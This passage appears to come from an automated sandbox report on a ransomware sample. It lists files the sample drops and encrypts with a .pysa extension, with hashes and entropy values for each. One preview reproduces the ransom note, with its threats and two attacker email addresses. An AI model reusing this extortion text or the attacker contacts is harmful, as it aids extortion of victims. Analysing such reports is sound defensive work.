                  SHA-256:7A831C5C89B060A9075093344DD849F4C2C0F89FA077E28AF37863C12BD33B73
                  SHA-512:CD72AB766F2B4B21C8DF27A5B16152E3D8881C59039A1B6ACC8C2286747628AB793E10FADA2BA3D1D586D6829E7C4F1F725876AB3F92041878ABE4E96D9487EC
                  Malicious:false
                  C:\Users\user\AppData\Local\Adobe\Acrobat\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Adobe\Color\Profiles\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  C:\Users\user\AppData\Local\Adobe\Color\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\Users\user\AppData\Local\Adobe\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  C:\Users\user\AppData\Local\Comms\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.676119332408718
                  Encrypted:false
                  SSDEEP:192:N+hADvUs2dRGT0daoGzdf3rpnw3qJcCdwFrs5pjFTNvakenC:oavUbNd1kfby3tIJFTIrnC
                  MD5:90D4F3AFE87B0BD796631EF0B943B78D
                  SHA1:69734B097B0CCAF2CF1F5006A27F3FAD361BBB88
                  SHA-256:DBE9DBE14CBAFF202441E3C5004AAB4766AAD131C7AF3FF2838E2E0C99BF41F8
                  SHA-512:ADF4B072338CF5C22F4CFEC7E8CACFDCAD705108B49AF0415DD42F1331AF4CFAD25F7338785DAA2582364089DF29D6DE0F092AED68454624B4D0030672C6A585
                  Malicious:false
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3074048
                  Entropy (8bit):7.99993040369862
                  Encrypted:true
                  SSDEEP:49152:p2l+mL4S75KwMyr+OtOatFQ5mUb5l0tK7ISrnPsOPNVQuuAPN3bfJRrHrbJY1E9N:pmt5KwMytOw+byoPsCQpM1FRLbMELhN
                  MD5:3BB61023B965AC8D44A35137B8934A06
                  SHA1:491799086DAE3D57136A62602BF1534467286529
                  SHA-256:81A5A19BCBDFE7B3C837796130ED479720C51CC558415B3ECC662043B4DDA310
                  SHA-512:293D1FA296CD005B828C9D1B6881820C0572A821B432636CFFEDB00AF47B5EE0DE787A74E98D49039BE34840D4F1F0BE0746283E967363376279C3A802E9BBBE
                  Malicious:true
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3074048
                  Entropy (8bit):7.9999394302453135
                  Encrypted:true
                  SSDEEP:49152:m7zx/4abYqbXhxoS/cZLVkT2k2z9X5ClptkRivywNJ4sIqxh3Hy9FH69Pp:m7zx/pbYqbXhxT/ni9X5+0AxJTIqv3mQ
                  MD5:E71215F62A7896A36A419E7CD0319FF5
                  SHA1:BD7149862B5D8F3BC2CF1676DCB8F2D458C83C35
                  SHA-256:3F432351987B168243408038F58EB5A4C0393BA30D3A4270F3A435CB11E37B49
                  SHA-512:EF247C64BA9CD59F5C7A55474C7C5248DEAB3BA4EEFBCC57C2A53037A010ACAEC27344D76F042AF35C0D38AFAB5F6E87F08083F195EC93173A6199E6C50E8A4D
                  Malicious:true
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3074048
                  Entropy (8bit):7.999934976914003
                  Encrypted:true
                  SSDEEP:49152:YRJQ03Kod78onoiV8jU65m1dUmGWwHOZt1bE9j9lqNI+qEzKFGR9sRqO+avAKx8G:wLKo7ntW5m1bMst1bmlq2+qQKFGRZ4v9
                  MD5:316B2A792C4FB688DB2C6E60A23F4F2C
                  SHA1:DE4A730E97540DDDF4D5EB93EDBCEBC6833D6943
                  SHA-256:E7A8F7B2CC45D619FFAFEE2419B2B0750D4D9725A07F388E1AEA65CC1E273FED
                  SHA-512:2B6982A6855957CA75E515918FA01E2CF56B6A6A84636E2C26A1EA436BB899237AB6EA06078339AD15AA4A87D24C5940E459E08122E188F9DB54DAD00B8F9DD4
                  Malicious:true
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3074048
                  Entropy (8bit):7.999938915544625
                  Encrypted:true
                  SSDEEP:49152:i9KLGbAgtg9caKX7SR0XTtfHzem5rkRcSKr8axhUocxc6d0FVPSB:imGbI+Ck/RptrF5Ts
                  MD5:8734B8477C4ECF4DECC9ECDBCAA2EEB1
                  SHA1:45D4092AE7846457B7437E8F71EDDE51F21304EE
                  SHA-256:E2588C647BD5A14FA4E1EF9A3439437FAB6CB5AB6C4668B553C687FC0FF3E8EF
                  SHA-512:10EEC58D54C7194FF5C76258ADA1C012E51F1D0B54E6AFB8CA8C7A3E1885CA97F82DE0E6AF3978FD406A6F3758F92615C4AAECE0BFC87D45440BD3E9EB67360B
                  Malicious:true
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):17408
                  Entropy (8bit):7.882525716677063
                  Encrypted:false
                  SSDEEP:384:dufN4VKdppl3khoLr+FwLESAm/ioa3xhVhG+TuEwkqmbChMVUIYSH3:wfN4wdLlQonLASb83xllrqmxUZW
                  MD5:1155E2E6B12E1855CB58009D169ECA59
                  SHA1:2781E5358B305DDD16C8405D8B4B1116DDFC1735
                  SHA-256:A92A5A29F0650C5EDFD0C4502A8315F10B20B26BA8448A95DE32C25E1D41EB7B
                  SHA-512:4EA272847B3BDB93D9C644806004E04DB6D21248B81AC48CAF10D61D919C07F4FF17ABC03D1FAD37A444C8D2F7D6298B325F5ECDAD5B877428E203C457594818
                  Malicious:false
                  C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6248448
                  Entropy (8bit):7.999971536234969
                  Encrypted:true
                  SSDEEP:98304:j72d9S0MQbTvLaQoFwpSwH34pUnyxHuP94JETMXp3xG/nLn3euqrvOVGp1MGVfYj:j72dV3LdoFwbSOCSTM53xG/nLwf3cDu6
                  MD5:D04E04B6251110B36918DF820761943A
                  SHA1:82D58B0748E8311CD13CF56E307D5D5C46612527
                  SHA-256:28D430CF2D0CB3B829A52A2FD6CF6C5E5B5046474DE6DF2188C103D961512A93
                  SHA-512:4156F9476C8C3C00F5596703F5162FB9E54945B0EEC8A39F10B1486EDCCF8B78A8E9C2F51A23BAFCE5842CAEB13F07370DFE9EE56BB31B5202A5BC34BFDBE665
                  Malicious:true
                  C:\Users\user\AppData\Local\Comms\Unistore\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  C:\Users\user\AppData\Local\Comms\Unistore\data\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.063228173161072
                  Encrypted:false
                  SSDEEP:48:GvRy9EcNjv+VvwLliFNrk91umZF+F0Y4Y6SOJHoI90i9zpRnzPqri:xJhv+lwLSpmZFZfSMII3vnui
                  MD5:9D99661199A48B41E351F3B783F593DD
                  SHA1:D0C1644E97150F6A8A5A888C9E860EA7B6C7CF07
                  SHA-256:85F2F50F30CA537B0C886168B9F80389B87979370B59F335B5FBC60E8A46E9EF
                  SHA-512:CF87E10DD2AAEB1A5AD70BDEFFEFCCBD7356D8CE10A2E30D86D1F6E7F3EE3B987C4CEBBE8843DDC1E04032B4190D02F3E8C059427FFB819A96FBCB30E3E34A94
                  Malicious:false
                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  C:\Users\user\AppData\Local\D3DSCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67584
                  Entropy (8bit):7.988715384476508
                  Encrypted:false
                  SSDEEP:1536:4/eCSaZ+YnPOr5BO+69OfaeS/LbEBxaRIh5tWue7LghMc0Yk:42Jv2PaLL69OyeWEu45tUYhjk
                  MD5:205A383408D67FD6BB760555211F0CCC
                  SHA1:984481B71DF8A7B53811EE67D477D55CD6FF105E
                  SHA-256:3F151C958253770ABA2323604DA07954646D537EF235071FF3A0A7B9911B0600
                  SHA-512:054FE963F0F0EA892AC4048A9B17C4458B0BABB7CC98BE637BAFDAA277C7F82AB2347C6D9E1CF6BC4FA9D3D2DD452558BBFA0DFF1147FF3B25DA67E8F8EAF1A6
                  Malicious:false
                  C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.767558396331468
                  Encrypted:false
                  SSDEEP:96:mPI6Cjef5aN1mQU1YDbxBZiYC72QFrTGjdkBkURo1xj:GIvkCmv1YDbViYagOBe1xj
                  MD5:6070682118F304449682F0DA3A0F5EF7
                  SHA1:8A7C62774A570E815FFCC23FAA536BCD96B5F270
                  SHA-256:062903567026572608C4965B20393395CAA65E0BFB877DAA9BCA4812B91099B5
                  SHA-512:555046C2712CAEEEB0E81D14AB1085B3BAEEE3738FAA91AB2AB5252CCCBB12139A0D2B6C78915B06CC8B19DB5FADC321A78B0C0B84F1758ED30C32F6B7169818
                  Malicious:false
                  C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2665
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArJ:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw
                  MD5:E70B9F07BFC5AFD9FA1531063C76B4FF
                  SHA1:EDC8D069D1876965882BD95CC2873AA412518C94
                  SHA-256:447D333B1A111F8E2C5A4622B9F51DC0D480A3AAE33767A4C708DC85B0A97D2F
                  SHA-512:C47502FE22653B9B7C420303A8DD751ED3B286FA465FDDFFE729DAFF6236906C490917882EC9DA4561D87555DBA5B5026AB1D9DF6EB0C7350A82BA5CD33924A4
                  Malicious:false
                  C:\Users\user\AppData\Local\DBG\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749CFD-12B4.pma.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4098048
                  Entropy (8bit):7.999949797704385
                  Encrypted:true
                  SSDEEP:98304:Y07of2vo/aCEtb1mo8h0vuQmg9823PtmDMVvSYxHvchmwFG:YDf2vkxEtbhvXSDM8gvcswk
                  MD5:5303F589B1426BFCF97DE329141ACEC7
                  SHA1:DF8878492AD4DDF42950305C8B569BBA7DB78070
                  SHA-256:0A62AE9D7CE2F0E1DBEC4F7963AA6E375BB7F797C0576FA9ED1B4E1BFDCD8513
                  SHA-512:DAF2827041DCF722014CDEFF717933A16ACB00AE33D853F4C8EA5399154DE8878C4067F7F5090DAC6773CF4A24721FA88CD979DB860F169BAFC6DA6A2C50A4A0
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749DC8-E1C.pma.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4098048
                  Entropy (8bit):7.999950382048557
                  Encrypted:true
                  SSDEEP:98304:R3PjMTVMgVigalnS3YW5eW/SVgx43EwBAqp6Cb/lGGQ7Qui:xITVMgVill8YW5eW/SVgx5NcGGQ7ni
                  MD5:22455CD4D4F3FF25541B36E212C714C8
                  SHA1:8079443A65655C8C5FE0D051D40500D1296225FF
                  SHA-256:244A8C03D0CDC34139B439BA8DA7467AAEA5BE74939C3A9E6812A30FD63615F1
                  SHA-512:5BED0D5A6DA7BC8EC5BC2EA9A3428AF2EDAD659D4C5BA1393160AA22A8E85810921C8EE4815F1B9318D36B496FFC09D383DB632DAA9D82145DDC35DC1489550C
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1026048
                  Entropy (8bit):7.999783556577424
                  Encrypted:true
                  SSDEEP:24576:H90eUJBJ+0ZEGQj9ucueT+res3o66VgrmdVXdbQN9:HgJXZER4cFmeYoD+rEVXdcN9
                  MD5:4DAEE97762C8CC4791F44E1199A36CC5
                  SHA1:DAD932562CACEF54E2C5A5ED18FD9A7AE557D5C1
                  SHA-256:B137F618B7978E8C66700CF0C20DF61555E8C558435B24ACA2145E16ED07DB30
                  SHA-512:0628984EDB94B3F1148FB15374FB2046B80AF5A2AF106FF4AFE81794F2CB93E4909D9FE6A71426B21EB82418C6D8A7FC38341F5A9C976C6944EB8E828114C5F9
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1026048
                  Entropy (8bit):7.999760520637093
                  Encrypted:true
                  SSDEEP:24576:dOZ/9pFdCTJSd1octNdha8UGF4uJRPz61keJWz:deS9O1oCHt21cz
                  MD5:3A4DF2A53EFB70F061E9885EB1B6D0B9
                  SHA1:9A8E873BA059616C7334D9D62725E91331A28442
                  SHA-256:E868A3C0C78814F1F4E9893B7810AE83EF5511C9FAE7E774C3BB0CCBD61375AC
                  SHA-512:3242292236B3C0DC97E2EE8728098F5902AE987786C5FF360820DBA5F41298E9BB87D3742A73761D0AA85B582BEB82D40BBAB58B98926157B0F764750156ABAD
                  Malicious:true
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
